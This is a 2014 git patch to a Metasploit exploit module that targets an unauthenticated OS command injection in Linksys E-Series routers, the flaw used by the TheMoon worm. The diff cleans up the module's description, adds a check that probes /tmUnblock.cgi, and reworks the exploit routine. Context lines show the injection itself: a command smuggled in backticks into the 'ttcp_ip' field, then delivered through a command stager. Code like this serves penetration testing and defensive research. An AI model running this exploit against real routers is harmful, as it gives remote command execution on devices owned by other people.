From 0ae75860ea27c42b1a0e077e25e7055d437db7e3 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 4 Apr 2014 14:02:12 -0500
Subject: [PATCH] Code clean up

---
 .../linux/http/linksys_themoon_exec.rb        | 63 ++++++++++---------
 1 file changed, 33 insertions(+), 30 deletions(-)

diff --git a/modules/exploits/linux/http/linksys_themoon_exec.rb b/modules/exploits/linux/http/linksys_themoon_exec.rb
index 4378d2daaf..68963d810c 100644
--- a/modules/exploits/linux/http/linksys_themoon_exec.rb
+++ b/modules/exploits/linux/http/linksys_themoon_exec.rb
@@ -15,14 +15,11 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'        => 'Linksys E-Series TheMoon Remote Command Injection',
       'Description' => %q{
-          Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
-        injection. Since it is a blind os command injection vulnerability, there is no
-        output for the executed command when using the cmd generic payload. A ping
-        command against a controlled system could be used for testing purposes. This
-        vulnerability was used from the so called "TheMoon" worm. There are many Systems
-        that might be vulnerable:
-        E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This
-        module was tested against a E1500 v1.0.5.
+        Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
+        injection. This vulnerability was used from the so called "TheMoon" worm. There
+        are many Linksys systems that might be vulnerable including E4200, E3200, E3000,
+        E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This module was tested
+        successfully against an E1500 v1.0.5.
       },
       'Author'      =>
         [
@@ -86,33 +83,39 @@ class Metasploit3 < Msf::Exploit::Remote
           "ttcp_ip" => "-h `#{cmd}`",
           "StartEPI" => "1"
         }
-      })
+      }, 2)
       return res
-    rescue ::Rex::ConnectionError
-      vprint_error("#{peer} - Failed to connect to the web server")
-      return nil
-    end
-  end
-
-  def exploit
-    print_status("#{peer} - Trying to access the vulnerable url")
-    begin
-      res = send_request_cgi({
-        'uri'     => '/tmUnblock.cgi',
-        'method'  => 'GET',
-      })
-      if res.nil? or res.code == 404
-        fail_with(Failure::NoAccess, "#{peer} - Access to the vulnerable URL is not possible")
-      end
-      if [200, 301, 302].include?(res.code)
-        print_good("#{peer} - Successfully accessed the vulnerable url")
-      else
-        fail_with(Failure::NoAccess, "#{peer} - Access to the vulnerable URL is not possible")
-      end
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
     end
+  end
 
+  def check
+    begin
+      res = send_request_cgi({
+        'uri'     => '/tmUnblock.cgi',
+        'method'  => 'GET'
+      })
+
+      if res && [200, 301, 302].include?(res.code)
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the vulnerable URL...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
+    end
+
+    print_status("#{peer} - Exploiting...")
     execute_cmdstager
   end
+
 end